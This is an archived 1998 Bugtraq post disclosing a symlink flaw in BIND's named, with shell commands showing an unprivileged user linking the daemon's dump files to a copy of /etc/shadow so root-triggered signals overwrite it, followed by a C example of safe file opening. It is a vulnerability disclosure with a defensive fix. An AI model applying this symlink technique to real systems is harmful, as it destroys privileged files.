[ Posted to BUGTRAQ and comp.protocols.dns.bind ]

[ Standard apologies if this is already known - a search on the Bugtraq archive and Deja News comp.protocols.dns.bind doesn't indicate it. ]

The new named(8) happily follows symlinks and clobbers any file on the system when it receives a SIGINT. (Used for debugging and statistics gathering.) SIGINT dumps the named database to /var/tmp/named_dump.db.

It will also happily append data to any system file when it receives a SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.

This problem is probably recursive to previous versions of named, but since I've already replaced mine I can't confirm that.

On Wed, 8 Apr 1998, Aleph One wrote:

[Snippage of the latest CERT]

> (Note: the in.named(8) man page mentions that sending a SIGINT to the
> in.named process will dump the current data base and cache to, by
> default, /var/tmp/named_dump.db. Some sites may find this useful in
> looking for self-referential CNAMEs. Please see the in.named(8) man
> page for further details.)

This caught my eye in that CERT advisory, and after updating my BIND to the new 4.9.7 (RedHat 4.2, Linux 2.0.30, i586) and reading through the named(8) man pages I ran a quick check.

    [root]# cp /etc/shadow /etc/junk.shadow
    [root]# ls -l /etc/junk.shadow
    -r--------   1 root     root          992 Apr 10 12:52 junk.shadow

Now as a non-priv user..

    [Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
    [Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
    [Luser]# logout

(Now if ever root sends a SIGINT or SIGIOT, /etc/junk.shadow is toast...)

    [root]# kill -SIGIOT [named.pid]
    [root]# ls -al /etc/junk.shadow
    -r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow
    [root]# less /etc/junk.shadow
    someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
    nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
    +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
    2368    time since boot (secs)
    2368    time since reset (secs)
    0       Unknown query types
    <SNIP>

The statistics dump gets appended to any file on the system.

Now for the real horror -

    [root]# kill -SIGINT [named.pid]
    [root]# ls -l /etc/junk.shadow
    -r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
    [root]# less /etc/junk.shadow
    ; Dumped at Fri Apr 10 13:02:40 1998
    ;; ++zone table++
    <SNIP>

No trace of the original remains. Your shadow password file or anything else on the system is fried.

Enjoy.

--
Joe H.                         Technical Support
General Support: supportat_private
Blarg! Online Services, Inc.   Voice: 425/401-9821 or 888/66-BLARG
http://www.blarg.net
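The defect described in the post is the classic symlink race: a privileged daemon writes to a fixed name in a world-writable directory, and open(2) follows whatever link another user left there. The following is an added example, not code from the post or from BIND, showing how a daemon can open a debug dump (create-only, like the SIGINT database dump) or a statistics log (append, like the SIGIOT case) without that hazard: O_EXCL refuses any pre-existing path including a symlink, O_NOFOLLOW refuses symlinks in append mode, and an fstat check rejects anything that is not a regular file with a single link. The demo function recreates the post's scenario in a private temporary directory (a constructed fixture, not the real /var/tmp) and reports whether both opens were refused and the "secret" file left intact. The function names and the fixture paths are this example's own choices.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a dump or statistics file defensively.
 *   create != 0: new dump file; O_EXCL makes open() fail with EEXIST if
 *                anything (file, symlink, even a dangling one) already
 *                sits at the path, so a planted link is never followed.
 *   create == 0: append to a statistics log; the path may already exist,
 *                but O_NOFOLLOW rejects symlinks (ELOOP) and the fstat
 *                check rejects non-regular files and hard links planted
 *                by another user (st_nlink != 1).
 * Returns an open fd, or -1 with errno set (EPERM for the sanity checks). */
int safe_open_output(const char *path, int create) {
    int flags = O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC;
    flags |= create ? O_EXCL : O_APPEND;
    int fd = open(path, flags, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Rebuild the post's scenario in a private temp dir (constructed fixture):
 * a "secret" file plus symlinks at the dump and stats names pointing at it.
 * Returns 0 if both opens are refused, the secret is unchanged, and an
 * unplanted path still works; otherwise the number of the failing step. */
int run_symlink_demo(void) {
    char dir[] = "/tmp/dumpdemo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 1;
    char secret[256], dump[256], stats[256];
    snprintf(secret, sizeof secret, "%s/junk.shadow", dir);
    snprintf(dump, sizeof dump, "%s/named_dump.db", dir);
    snprintf(stats, sizeof stats, "%s/named.stats", dir);

    /* constructed stand-in for the copied shadow line in the post */
    const char *orig = "someusr:x:10311:-1:-1:-1:-1:-1:-1\n";
    int fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return 2;
    (void)write(fd, orig, strlen(orig));
    close(fd);

    /* the "Luser" step: links at the daemon's fixed output names */
    if (symlink(secret, dump) != 0 || symlink(secret, stats) != 0)
        return 3;

    int rc = 0;
    if (safe_open_output(dump, 1) != -1)   /* SIGINT-style dump */
        rc = 4;
    if (rc == 0 && safe_open_output(stats, 0) != -1)   /* SIGIOT-style append */
        rc = 5;

    /* the secret must be byte-for-byte unchanged */
    char buf[128] = {0};
    fd = open(secret, O_RDONLY);
    if (fd < 0) {
        rc = rc ? rc : 6;
    } else {
        ssize_t n = read(fd, buf, sizeof buf - 1);
        close(fd);
        if (rc == 0 && (n != (ssize_t)strlen(orig) || strcmp(buf, orig) != 0))
            rc = 7;
    }

    /* a path nobody planted is still usable for the real dump */
    if (rc == 0) {
        unlink(dump);
        int ok = safe_open_output(dump, 1);
        if (ok < 0)
            rc = 8;
        else
            close(ok);
    }

    unlink(dump);
    unlink(stats);
    unlink(secret);
    rmdir(dir);
    return rc;
}

int main(void) {
    int rc = run_symlink_demo();
    printf(rc == 0 ? "planted links refused, secret intact\n"
                   : "demo failed at step %d\n", rc);
    return rc;
}
```

The open flags close the hole the post demonstrates, but the stronger fix is to stop writing into a shared sticky directory at all: a dump path inside a directory writable only by the daemon's own account removes the other user's ability to plant anything there in the first place.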
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:55 PDT